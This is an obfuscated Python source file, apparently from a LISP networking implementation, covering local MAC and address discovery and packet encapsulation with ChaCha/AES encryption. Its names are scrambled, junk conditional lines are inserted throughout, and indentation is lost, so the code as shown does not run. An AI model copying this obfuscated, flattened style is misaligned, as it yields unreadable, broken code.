if 6 - 6: I1ii11iIi11i - oO0o * i11iIiiIii + OoOoOO00 / ooOoO0o % OOooOOo
if 38 - 38: OOooOOo % IiII % II111iiii - Oo0Ooo - iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 28 - 28: OoooooooOO % oO0o + I1ii11iIi11i + O0 . I1Ii111
def lisp_is_mac_string ( mac_str ) :
O0o0oo0oOO0oO = mac_str . split ( "/" )
if ( len ( O0o0oo0oOO0oO ) == 2 ) : mac_str = O0o0oo0oOO0oO [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
def lisp_get_local_macs ( ) :
for OoO0 in netifaces . interfaces ( ) :
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
iiIi = OoO0 . replace ( ":" , "" )
iiIi = OoO0 . replace ( "-" , "" )
if ( iiIi . isalnum ( ) == False ) : continue
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if 90 - 90: Oo0Ooo * I1IiiI
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
try :
I1iI1i11IiI11 = netifaces . ifaddresses ( OoO0 )
except :
continue
if 82 - 82: I1Ii111 * OoO0O00
if ( netifaces . AF_LINK not in I1iI1i11IiI11 ) : continue
O0o0oo0oOO0oO = I1iI1i11IiI11 [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
O0o0oo0oOO0oO = O0o0oo0oOO0oO . replace ( ":" , "" )
if 32 - 32: O0
if 73 - 73: O0 . I1ii11iIi11i % IiII + OoO0O00 * I11i - OoOoOO00
if 52 - 52: OOooOOo * oO0o + I11i * I11i % i1IIi % I11i
if 96 - 96: o0oOOo0O0Ooo * oO0o - OOooOOo * o0oOOo0O0Ooo * i1IIi
if 8 - 8: ooOoO0o - Oo0Ooo + iIii1I11I1II1 + i1IIi * Ii1I - iIii1I11I1II1
if ( len ( O0o0oo0oOO0oO ) < 12 ) : continue
if 30 - 30: I11i / I1ii11iIi11i
if ( O0o0oo0oOO0oO not in lisp_mymacs ) : lisp_mymacs [ O0o0oo0oOO0oO ] = [ ]
lisp_mymacs [ O0o0oo0oOO0oO ] . append ( OoO0 )
if 22 - 22: oO0o * iII111i
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
if 75 - 75: OoooooooOO . OOooOOo + OoO0O00 / Ii1I - I1IiiI % Ii1I
if 89 - 89: iII111i * iIii1I11I1II1 + i11iIiiIii . OoooooooOO
def lisp_get_local_rloc ( ) :
O0O0 = getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( O0O0 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 74 - 74: OoOoOO00 / i1IIi % OoooooooOO
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
O0O0 = O0O0 . split ( "\n" ) [ 0 ]
OoO0 = O0O0 . split ( ) [ - 1 ]
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
oOOOo0o = ""
ooOOo = lisp_is_macos ( )
if ( ooOOo ) :
O0O0 = getoutput ( "ifconfig {} | egrep 'inet '" . format ( OoO0 ) )
if ( O0O0 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
i1iii1IiiiI1i1 = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OoO0 )
O0O0 = getoutput ( i1iii1IiiiI1i1 )
if ( O0O0 == "" ) :
i1iii1IiiiI1i1 = 'ip addr show | egrep "inet " | egrep "global lo"'
O0O0 = getoutput ( i1iii1IiiiI1i1 )
if 37 - 37: Oo0Ooo - i1IIi - IiII + I11i . iIii1I11I1II1
if ( O0O0 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 59 - 59: OoooooooOO - I1Ii111 % o0oOOo0O0Ooo . I11i + i1IIi * I11i
if 5 - 5: II111iiii - IiII
if 86 - 86: IiII * I11i + O0 * I1Ii111 + i11iIiiIii - I1ii11iIi11i
if 70 - 70: i11iIiiIii
if 57 - 57: I11i % OOooOOo + ooOoO0o * Ii1I . Oo0Ooo
if 78 - 78: OoooooooOO / i1IIi . OOooOOo
oOOOo0o = ""
O0O0 = O0O0 . split ( "\n" )
if 88 - 88: I11i + I1IiiI - I11i / OoooooooOO - i11iIiiIii
for i11 in O0O0 :
OoOOOO = i11 . split ( ) [ 1 ]
if ( ooOOo == False ) : OoOOOO = OoOOOO . split ( "/" ) [ 0 ]
Ii1IiIIIi = lisp_address ( LISP_AFI_IPV4 , OoOOOO , 32 , 0 )
return ( Ii1IiIIIi )
if 71 - 71: OoO0O00 % I1IiiI - iII111i . iII111i
return ( lisp_address ( LISP_AFI_IPV4 , oOOOo0o , 32 , 0 ) )
if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
if 64 - 64: i1IIi % I1ii11iIi11i / Ii1I % OoooooooOO
if 24 - 24: I1Ii111 + OoooooooOO . IiII / OoOoOO00 / I11i
if 65 - 65: OoooooooOO
if 18 - 18: O0 - i1IIi . I1Ii111
if 98 - 98: o0oOOo0O0Ooo
if 73 - 73: Oo0Ooo - iII111i . oO0o % i1IIi . O0
if 15 - 15: ooOoO0o . iIii1I11I1II1 * I1IiiI % I11i
if 21 - 21: OoO0O00 - I1IiiI . OoooooooOO
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo / iIii1I11I1II1 * I1Ii111
if 3 - 3: OOooOOo . IiII / Oo0Ooo
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 89 - 89: OoooooooOO . iIii1I11I1II1 . Oo0Ooo * iIii1I11I1II1 - I1Ii111
if 92 - 92: OoooooooOO - I1ii11iIi11i - OoooooooOO % I1IiiI % I1IiiI % iIii1I11I1II1
if 92 - 92: iII111i * O0 % I1Ii111 . iIii1I11I1II1
if 66 - 66: I11i + Ii1I
if 48 - 48: I1ii11iIi11i
if 96 - 96: ooOoO0o . OoooooooOO
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
OoO000oo000o0 = None
OOOooo0OooOoO = 1
i1Ii1I1Ii11iI = os . getenv ( "LISP_ADDR_SELECT" )
if ( i1Ii1I1Ii11iI != None and i1Ii1I1Ii11iI != "" ) :
i1Ii1I1Ii11iI = i1Ii1I1Ii11iI . split ( ":" )
if ( len ( i1Ii1I1Ii11iI ) == 2 ) :
OoO000oo000o0 = i1Ii1I1Ii11iI [ 0 ]
OOOooo0OooOoO = i1Ii1I1Ii11iI [ 1 ]
else :
if ( i1Ii1I1Ii11iI [ 0 ] . isdigit ( ) ) :
OOOooo0OooOoO = i1Ii1I1Ii11iI [ 0 ]
else :
OoO000oo000o0 = i1Ii1I1Ii11iI [ 0 ]
if 8 - 8: I1ii11iIi11i
if 82 - 82: OoooooooOO
OOOooo0OooOoO = 1 if ( OOOooo0OooOoO == "" ) else int ( OOOooo0OooOoO )
if 75 - 75: II111iiii % I1IiiI + OOooOOo % OoooooooOO / IiII
if 4 - 4: i11iIiiIii - OOooOOo % I1ii11iIi11i * I1Ii111 % o0oOOo0O0Ooo
o0O = [ None , None , None ]
oOoo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0OoO0o0Oooo = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
Ooo0oOOoo0O = None
if 57 - 57: I1IiiI . i11iIiiIii * II111iiii + OoooooooOO + Ii1I
for OoO0 in netifaces . interfaces ( ) :
if ( OoO000oo000o0 != None and OoO000oo000o0 != OoO0 ) : continue
O00Oo = netifaces . ifaddresses ( OoO0 )
if ( O00Oo == { } ) : continue
if 73 - 73: O0 % I11i + iII111i . I1ii11iIi11i . I1ii11iIi11i + IiII
if 30 - 30: OoOoOO00
if 89 - 89: I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
Ooo0oOOoo0O = lisp_get_interface_instance_id ( OoO0 , None )
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
if ( netifaces . AF_INET in O00Oo ) :
ooooo0Oo0 = O00Oo [ netifaces . AF_INET ]
IiI = 0
for oOOOo0o in ooooo0Oo0 :
oOoo . store_address ( oOOOo0o [ "addr" ] )
if ( oOoo . is_ipv4_loopback ( ) ) : continue
if ( oOoo . is_ipv4_link_local ( ) ) : continue
if ( oOoo . address == 0 ) : continue
IiI += 1
oOoo . instance_id = Ooo0oOOoo0O
if ( OoO000oo000o0 == None and
lisp_db_for_lookups . lookup_cache ( oOoo , False ) ) : continue
o0O [ 0 ] = oOoo
if ( IiI == OOOooo0OooOoO ) : break
if 9 - 9: II111iiii % OoOoOO00
if 26 - 26: iIii1I11I1II1 - I1ii11iIi11i . IiII . IiII + iIii1I11I1II1 * Oo0Ooo
if ( netifaces . AF_INET6 in O00Oo ) :
o0I1IIIi11ii11 = O00Oo [ netifaces . AF_INET6 ]
IiI = 0
for oOOOo0o in o0I1IIIi11ii11 :
Oo0o = oOOOo0o [ "addr" ]
O0OoO0o0Oooo . store_address ( Oo0o )
if ( O0OoO0o0Oooo . is_ipv6_string_link_local ( Oo0o ) ) : continue
if ( O0OoO0o0Oooo . is_ipv6_loopback ( ) ) : continue
IiI += 1
O0OoO0o0Oooo . instance_id = Ooo0oOOoo0O
if ( OoO000oo000o0 == None and
lisp_db_for_lookups . lookup_cache ( O0OoO0o0Oooo , False ) ) : continue
o0O [ 1 ] = O0OoO0o0Oooo
if ( IiI == OOOooo0OooOoO ) : break
if 85 - 85: OOooOOo + II111iiii - OOooOOo * oO0o - i1IIi % iII111i
if 1 - 1: OoooooooOO / O0 + OoOoOO00 + OoOoOO00 . I1Ii111 - OoOoOO00
if 9 - 9: I1Ii111 * OoooooooOO % I1IiiI / OoOoOO00 * I11i
if 48 - 48: OoooooooOO . OoOoOO00
if 65 - 65: oO0o . Oo0Ooo
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if ( o0O [ 0 ] == None ) : continue
if 69 - 69: O0 - O0
o0O [ 2 ] = OoO0
break
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
III = o0O [ 0 ] . print_address_no_iid ( ) if o0O [ 0 ] else "none"
I1I = o0O [ 1 ] . print_address_no_iid ( ) if o0O [ 1 ] else "none"
OoO0 = o0O [ 2 ] if o0O [ 2 ] else "none"
if 70 - 70: Ii1I . O0 - OOooOOo
OoO000oo000o0 = " (user selected)" if OoO000oo000o0 != None else ""
if 62 - 62: I1Ii111 * I11i
III = red ( III , False )
I1I = red ( I1I , False )
OoO0 = bold ( OoO0 , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( III , I1I , OoO0 , OoO000oo000o0 , Ooo0oOOoo0O ) )
if 74 - 74: OoOoOO00 . iIii1I11I1II1
if 87 - 87: ooOoO0o
lisp_myrlocs = o0O
return ( ( o0O [ 0 ] != None ) )
if 41 - 41: OoOoOO00 . iIii1I11I1II1 % ooOoO0o + O0
if 22 - 22: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o + I1ii11iIi11i * iII111i . i11iIiiIii
if 90 - 90: OOooOOo * OoOoOO00 - Oo0Ooo + o0oOOo0O0Ooo
if 53 - 53: OoooooooOO . OoooooooOO + o0oOOo0O0Ooo - iII111i + OOooOOo
if 44 - 44: I1Ii111 - IiII
if 100 - 100: oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
def lisp_get_all_addresses ( ) :
o00oOoo0o00 = [ ]
for i1i1111I in netifaces . interfaces ( ) :
try : iIiiI11II11i = netifaces . ifaddresses ( i1i1111I )
except : continue
if 98 - 98: iII111i - iII111i
if ( netifaces . AF_INET in iIiiI11II11i ) :
for oOOOo0o in iIiiI11II11i [ netifaces . AF_INET ] :
OoOOOO = oOOOo0o [ "addr" ]
if ( OoOOOO . find ( "127.0.0.1" ) != - 1 ) : continue
o00oOoo0o00 . append ( OoOOOO )
if 58 - 58: oO0o
if 98 - 98: o0oOOo0O0Ooo * OoO0O00
if ( netifaces . AF_INET6 in iIiiI11II11i ) :
for oOOOo0o in iIiiI11II11i [ netifaces . AF_INET6 ] :
OoOOOO = oOOOo0o [ "addr" ]
if ( OoOOOO == "::1" ) : continue
if ( OoOOOO [ 0 : 5 ] == "fe80:" ) : continue
o00oOoo0o00 . append ( OoOOOO )
if 10 - 10: oO0o - iII111i % II111iiii - I1Ii111 - i1IIi
if 10 - 10: I1ii11iIi11i - I11i . I1Ii111
if 8 - 8: iIii1I11I1II1 % oO0o + Oo0Ooo
return ( o00oOoo0o00 )
if 24 - 24: o0oOOo0O0Ooo / Ii1I / Ii1I % II111iiii - oO0o * oO0o
if 58 - 58: OoOoOO00
if 60 - 60: II111iiii
if 90 - 90: OoOoOO00
if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
if 18 - 18: OoooooooOO
if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
def lisp_get_all_multicast_rles ( ) :
o0OOo0O = [ ]
O0O0 = getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( O0O0 == "" ) : return ( o0OOo0O )
if 52 - 52: OoooooooOO / IiII % II111iiii
Ii11I1I11II = O0O0 . split ( "\n" )
for i11 in Ii11I1I11II :
if ( i11 [ 0 ] == "#" ) : continue
IIiiiI = i11 . split ( "rle-address = " ) [ 1 ]
oO0Oooo0OoO = int ( IIiiiI . split ( "." ) [ 0 ] )
if ( oO0Oooo0OoO >= 224 and oO0Oooo0OoO < 240 ) : o0OOo0O . append ( IIiiiI )
if 38 - 38: I1IiiI . I1IiiI . Ii1I + I1ii11iIi11i * Oo0Ooo
return ( o0OOo0O )
if 61 - 61: II111iiii . IiII - O0 * IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
if 92 - 92: OoO0O00 * IiII
if 92 - 92: oO0o
if 7 - 7: iII111i
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
class lisp_packet ( object ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
def encode ( self , nonce ) :
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if ( self . outer_source . is_null ( ) ) : return ( None )
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
if 98 - 98: Ii1I - II111iiii / I1IiiI . oO0o * IiII . I11i
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 6 - 6: oO0o . I11i
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
if 50 - 50: oO0o % i1IIi * O0
self . lisp_header . instance_id ( self . inner_dest . instance_id )
if 4 - 4: iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
if 84 - 84: iIii1I11I1II1 / I1IiiI . OoOoOO00 % I11i
self . lisp_header . key_id ( 0 )
oOoO000 = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and oOoO000 == False ) :
Oo0o = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if 86 - 86: iIii1I11I1II1 - I11i % ooOoO0o . OOooOOo * OoOoOO00 . i1IIi
if ( Oo0o in lisp_crypto_keys_by_rloc_encap ) :
O0o0O0 = lisp_crypto_keys_by_rloc_encap [ Oo0o ]
if ( O0o0O0 [ 1 ] ) :
O0o0O0 [ 1 ] . use_count += 1
OO0Oo00OO0oo , oOO00o0O0 = self . encrypt ( O0o0O0 [ 1 ] , Oo0o )
if ( oOO00o0O0 ) : self . packet = OO0Oo00OO0oo
if 47 - 47: ooOoO0o
if 63 - 63: II111iiii / i11iIiiIii % II111iiii . I1ii11iIi11i
if 6 - 6: OOooOOo + i11iIiiIii
if 26 - 26: IiII / Ii1I - OoooooooOO
if 9 - 9: OoooooooOO * I1ii11iIi11i
if 9 - 9: Oo0Ooo + iII111i
if 64 - 64: O0 * I1IiiI / I1IiiI
if 57 - 57: I1ii11iIi11i / OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
else :
self . udp_sport = lisp_crypto_ephem_port
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
else :
self . udp_sport = LISP_DATA_PORT
if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
iiI1iiIiiiI1I = socket . htons ( self . udp_sport )
i111I1 = socket . htons ( self . udp_dport )
OOOo0Oo0O = socket . htons ( self . udp_length )
Ii1iiI1 = struct . pack ( "HHHH" , iiI1iiIiiiI1I , i111I1 , OOOo0Oo0O , self . udp_checksum )
if 48 - 48: ooOoO0o % OoOoOO00
if 67 - 67: iIii1I11I1II1 % OoO0O00 + i11iIiiIii
if 46 - 46: I1IiiI . IiII - i11iIiiIii - I1Ii111
if 97 - 97: II111iiii % Oo0Ooo * IiII
oOoOO0O00o = self . lisp_header . encode ( )
if 77 - 77: I1Ii111 + oO0o
if 38 - 38: I1ii11iIi11i - Ii1I * o0oOOo0O0Ooo
if 13 - 13: I1IiiI * oO0o
if 41 - 41: IiII
if 16 - 16: iIii1I11I1II1
if ( self . outer_version == 4 ) :
o000o0o00Oo = socket . htons ( self . udp_length + 20 )
oo0O00o0O0Oo = socket . htons ( 0x4000 )
iii11 = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , o000o0o00Oo , 0xdfdf ,
oo0O00o0O0Oo , self . outer_ttl , 17 , 0 )
iii11 += self . outer_source . pack_address ( )
iii11 += self . outer_dest . pack_address ( )
iii11 = lisp_ip_checksum ( iii11 )
elif ( self . outer_version == 6 ) :
iii11 = b""
if 20 - 20: OOooOOo - iII111i / Oo0Ooo * OoO0O00
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
else :
return ( None )
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
self . packet = iii11 + Ii1iiI1 + oOoOO0O00o + self . packet
return ( self )
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
def cipher_pad ( self , packet ) :
iI = len ( packet )
if ( ( iI % 16 ) != 0 ) :
o00ooO000Oo00 = ( old_div ( iI , 16 ) + 1 ) * 16
packet = packet . ljust ( o00ooO000Oo00 )
if 43 - 43: OoO0O00 . ooOoO0o * Oo0Ooo
return ( packet )
if 20 - 20: i1IIi . i1IIi - I11i
if 89 - 89: ooOoO0o - I11i . O0 % OoooooooOO . i11iIiiIii
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
if 35 - 35: II111iiii / OoOoOO00 - O0 . II111iiii
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
OO0Oo00OO0oo = self . cipher_pad ( self . packet )
iI1ii = key . get_iv ( )
if 61 - 61: Oo0Ooo * i1IIi . OoooooooOO
i1 = lisp_get_timestamp ( )
iIIiI = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
O0O0O0OO00oo = chacha . ChaCha ( key . encrypt_key , iI1ii ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
try :
o0oOOO = AES . new ( I11IIIIiI1 , AES . MODE_GCM , iI1ii )
O0O0O0OO00oo = o0oOOO . encrypt
iIIiI = o0oOOO . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
if 62 - 62: Ii1I - oO0o % iIii1I11I1II1
else :
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
O0O0O0OO00oo = AES . new ( I11IIIIiI1 , AES . MODE_CBC , iI1ii ) . encrypt
if 57 - 57: OoooooooOO / OoOoOO00
if 44 - 44: OoOoOO00 * i1IIi * O0
oooo0o0oO = O0O0O0OO00oo ( OO0Oo00OO0oo )
if 15 - 15: iIii1I11I1II1 . OOooOOo . I1ii11iIi11i * i11iIiiIii
if ( oooo0o0oO == None ) : return ( [ self . packet , False ] )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 72 - 72: I11i
if 26 - 26: IiII % Oo0Ooo
if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
if 83 - 83: IiII - I1IiiI . Ii1I
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
if 5 - 5: i11iIiiIii * iII111i - Ii1I - I1ii11iIi11i - i1IIi + iII111i
if ( iIIiI != None ) : oooo0o0oO += iIIiI ( )
if 4 - 4: ooOoO0o + O0 . i1IIi * I1ii11iIi11i - o0oOOo0O0Ooo
if 42 - 42: o0oOOo0O0Ooo * OoOoOO00 . OoO0O00 - iII111i / II111iiii
if 25 - 25: Oo0Ooo % OoOoOO00
if 75 - 75: i1IIi
if 74 - 74: Oo0Ooo + I1Ii111 - oO0o - OoO0O00 + iII111i - iIii1I11I1II1
self . lisp_header . key_id ( key . key_id )
oOoOO0O00o = self . lisp_header . encode ( )
if 54 - 54: I1ii11iIi11i + II111iiii . I1IiiI / OoO0O00 . ooOoO0o
O00oooO00oo = key . do_icv ( oOoOO0O00o + iI1ii + oooo0o0oO , iI1ii )
if 44 - 44: iIii1I11I1II1 * I1Ii111 * Oo0Ooo * I1ii11iIi11i + I11i
III1i1IIII1i = 4 if ( key . do_poly ) else 8
if 48 - 48: OoooooooOO
Oo0OOOOOOO0oo = bold ( "Encrypt" , False )
II1Iiiii111i = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
OooooO0o0 = "poly" if key . do_poly else "sha256"
OooooO0o0 = bold ( OooooO0o0 , False )
OOoo00o00O0o0 = "ICV({}): 0x{}...{}" . format ( OooooO0o0 , O00oooO00oo [ 0 : III1i1IIII1i ] , O00oooO00oo [ - III1i1IIII1i : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( Oo0OOOOOOO0oo , key . key_id , addr_str , OOoo00o00O0o0 , II1Iiiii111i , i1 ) )
if 3 - 3: I1ii11iIi11i * I11i
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
O00oooO00oo = int ( O00oooO00oo , 16 )
if ( key . do_poly ) :
oo00oO = byte_swap_64 ( ( O00oooO00oo >> 64 ) & LISP_8_64_MASK )
I11i1I11 = byte_swap_64 ( O00oooO00oo & LISP_8_64_MASK )
O00oooO00oo = struct . pack ( "QQ" , oo00oO , I11i1I11 )
else :
oo00oO = byte_swap_64 ( ( O00oooO00oo >> 96 ) & LISP_8_64_MASK )
I11i1I11 = byte_swap_64 ( ( O00oooO00oo >> 32 ) & LISP_8_64_MASK )
I1iIiiI11 = socket . htonl ( O00oooO00oo & 0xffffffff )
O00oooO00oo = struct . pack ( "QQI" , oo00oO , I11i1I11 , I1iIiiI11 )
if 27 - 27: iII111i
if 74 - 74: IiII / ooOoO0o
return ( [ iI1ii + oooo0o0oO + O00oooO00oo , True ] )
if 86 - 86: O0 . i1IIi - OoO0O00 / Oo0Ooo / I1ii11iIi11i
if 64 - 64: OoooooooOO - i1IIi / II111iiii
def decrypt ( self , packet , header_length , key , addr_str ) :
if 49 - 49: Oo0Ooo + O0 + IiII . II111iiii % ooOoO0o
if 33 - 33: OoOoOO00 . iIii1I11I1II1 / I11i % Ii1I
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
if 27 - 27: OoO0O00 + Oo0Ooo
if 92 - 92: I1IiiI % iII111i
if 31 - 31: OoooooooOO - oO0o / I1Ii111
if ( key . do_poly ) :
oo00oO , I11i1I11 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
oo00o000O = byte_swap_64 ( oo00oO ) << 64
oo00o000O |= byte_swap_64 ( I11i1I11 )
oo00o000O = lisp_hex_string ( oo00o000O ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
III1i1IIII1i = 4
OooO0o = bold ( "poly" , False )
else :
oo00oO , I11i1I11 , I1iIiiI11 = struct . unpack ( "QQI" , packet [ - 20 : : ] )
oo00o000O = byte_swap_64 ( oo00oO ) << 96
oo00o000O |= byte_swap_64 ( I11i1I11 ) << 32
oo00o000O |= socket . htonl ( I1iIiiI11 )
oo00o000O = lisp_hex_string ( oo00o000O ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
III1i1IIII1i = 8
OooO0o = bold ( "sha" , False )
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
oOoOO0O00o = self . lisp_header . encode ( )
if 31 - 31: i1IIi % II111iiii
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
